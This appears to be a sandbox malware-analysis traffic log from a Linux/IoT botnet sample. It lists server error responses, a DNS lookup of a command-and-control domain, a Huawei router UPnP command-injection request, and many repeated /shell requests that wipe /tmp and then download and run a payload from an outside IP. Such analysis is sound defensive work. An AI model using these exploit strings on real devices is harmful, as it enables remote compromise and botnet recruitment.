Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Sat, 19 Feb 2022 15:06:58 GMTContent-Type: text/htmlContent-Length: 167Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 19 Feb 2022 15:06:58 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Sat, 19 Feb 2022 15:06:59 GMTContent-Type: text/htmlContent-Length: 167Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: awselb/2.0Date: Sat, 19 Feb 2022 15:07:02 GMTContent-Type: text/plain; charset=utf-8Content-Length: 0Connection: keep-alive
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 19 Feb 2022 15:07:04 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 19 Feb 2022 15:07:04 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 19 Feb 2022 15:07:07 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 0Date: Sat, 19 Feb 2022 15:07:17 GMT
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 19 Feb 2022 15:07:08 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sat, 19 Feb 2022 15:07:10 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Feb 2022 14:54:11 GMTServer: Apache/2.2.15Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Feb 2022 15:07:11 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 278Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 19 Feb 2022 15:07:57 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 19 Feb 2022 15:07:19 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: file1 String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: file1 String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: motd-news.20.dr String found in binary or memory: https://ubuntu.com/blog/microk8s-memory-optimisation
Source: unknown HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: unknown DNS traffic detected: queries for: cnc.luxstresser.xyz
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
